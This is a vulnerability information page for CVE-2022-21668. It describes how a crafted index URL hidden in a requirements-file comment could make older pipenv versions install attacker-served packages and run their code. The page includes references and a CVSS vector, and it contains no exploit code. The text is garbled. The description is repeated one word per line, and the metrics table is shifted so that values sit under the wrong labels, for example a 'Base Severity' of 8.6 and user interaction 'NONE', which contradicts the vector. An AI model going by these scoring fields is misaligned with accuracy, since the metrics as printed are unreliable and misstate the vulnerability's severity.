CVE-2022-21668 Information
Description
pipenv is a Python development workflow tool. Starting with version 2018.10.9 and prior to version 2022.1.8 a flaw in pipenv’s parsing of requirements files allows an attacker to insert a specially crafted string inside a comment anywhere within a requirements.txt file which will cause victims who use pipenv to install the requirements file to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server the attacker can trigger arbitrary remote code execution (RCE) on the victims’ systems. If an attacker is able to hide a malicious --index-url option in a requirements file that a victim installs with pipenv the attacker can embed arbitrary malicious code in packages served from their malicious index server that will be executed on the victim’s host during installation (remote code execution/RCE). When pip installs from a source distribution any code in the setup.py is executed by the install process. This issue is patched in version 2022.1.8. The GitHub Security Advisory contains more information about this vulnerability.
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Reference
https://github.com/pypa/pipenv/releases/tag/v2022.1.8
https://github.com/pypa/pipenv/security/advisories/GHSA-qc9x-gjcv-465w
https://github.com/pypa/pipenv/commit/439782a8ae36c4762c88e43d5f0d8e563371b46f
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KCROBYHUS6DKQPCXBRPCZ5CDBNQTYAWT/
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QHQRIWKDP3SVJABAPEXBIQPKDI6UP7G4/
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/56HBA3EOSLEDNCCBJVHE6DO34P56EOUM/
pipenv
is
a
Python
development
workflow
tool.
Starting
with
version
2018.10.9
and
prior
to
version
2022.1.8
a
flaw
in
pipenv’s
parsing
of
requirements
files
allows
an
attacker
to
insert
a
specially
crafted
string
inside
a
comment
anywhere
within
a
requirements.txt
file
which
will
cause
victims
who
use
pipenv
to
install
the
requirements
file
to
download
dependencies
from
a
package
index
server
controlled
by
the
attacker.
By
embedding
malicious
code
in
packages
served
from
their
malicious
index
server
the
attacker
can
trigger
arbitrary
remote
code
execution
(RCE)
on
the
victims'
systems.
If
an
attacker
is
able
to
hide
a
malicious
--index-url
option
in
a
requirements
file
that
a
victim
installs
with
pipenv
the
attacker
can
embed
arbitrary
malicious
code
in
packages
served
from
their
malicious
index
server
that
will
be
executed
on
the
victim’s
host
during
installation
(remote
code
execution/RCE).
When
pip
installs
from
a
source
distribution
any
code
in
the
setup.py
is
executed
by
the
install
process.
This
issue
is
patched
in
version
2022.1.8.
The
GitHub
Security
Advisory
contains
more
information
about
this
vulnerability.
Attack Complexity
LOW
Privileges Required
NONE
User Interaction Required
NONE
Scope
REQUIRED
Confidentiality Impact
CHANGED
Integrity Impact
HIGH
Availability Impact
HIGH
Base Score
HIGH
Base Severity
8.6
Share on: